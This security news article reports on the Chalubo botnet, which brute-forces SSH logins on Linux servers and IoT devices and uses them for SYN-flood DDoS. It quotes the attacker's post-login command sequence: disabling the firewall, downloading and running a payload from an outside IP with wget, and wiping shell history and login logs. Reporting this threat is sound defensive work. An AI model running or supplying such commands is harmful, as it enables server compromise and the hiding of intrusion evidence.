DDOS

Chalubo Botnet Compromise Your Server or IoT Device & Use it for DDOS Attack

Newly Discovered Chalubo Botnet that compromises the internet facing SSH servers on Linux-based systems, IOT Devices and uses it for Distributed denial-of-service attack.

Malware author using various evasion technique and more common windows malware principals to prevent from detection tools and also it adopted the anti analyzing technique to make it analyzing difficult.

Researchers believe that the Chalubo Botnet campaign started since August 2018 and it used 3 main components that have been retrieved for from victims device by executing the command from an attacker.

Downloader, the main bot, Lua command script, In this case, the main bot ran only on systems with an x86 processor architecture.

Here Attacker encrypts both the main bot component and its corresponding Lua script using the ChaCha stream cipher.

Also You can Take DDoS Protection Bootcamp – Free Training Course to Improve Your DDoS Protection Skills.

Chalubo Botnet Attack Process

Researchers from Sophos Initially discovered the Chalubo Botnet from their honeypot and identified that the bot attempting to brute force login credentials against an SSH server.

Honeypot was open to accepting various attack with a wide range of credentials based brute force attack and researchers have learned that the attackers using a combination of root:admin to gain a shell.

Later attackers issued the following command once the accessed the server where they are using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware.

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c

Later the Downloader using one of the functions from Mirai Botnet and create an empty file to prevent multiple occurrences of the malware from executing and moving into the encryption process and drops the main bot.

After analyzing the main bot, researchers identified that Chalubo had copied a few code snippets from Mirai.

According to Sophos,” the bot’s Lua script communicates with the C2 server to receive further instructions. Its purpose is to download, decrypt, then execute whatever Lua script it finds.
The Lua retrieved by the bots we tested trigger the bot to perform a SYN flood attack against a single Chinese IP address over port 10100, without masking the local source IP. Interestingly it checks the /24 address of the local IP against 23.247.2.0, and if it is in that range, then it will set the source IP to one within the 183.131.206.0/24 range.”

This Bot mainly using the common username and password combinations against SSH servers.

An organization should always ensure and focus on maximum Protection level for enterprise networks and you can try a free trial to Stop DDoS Attack in 10 Seconds. Also, Check Your Company’s DDOS Attack Downtime Cost.

“Recommend that sysadmins of SSH servers (including embedded devices) change any default passwords on those devices, because the brute force attempts to cycle through common, publicly known default passwords. ”

If possible, it’s preferable to use SSH keys instead of passwords for logins. As with any machine, make sure to keep the system updated!

Also Read:

To Top

Pin It on Pinterest

Share This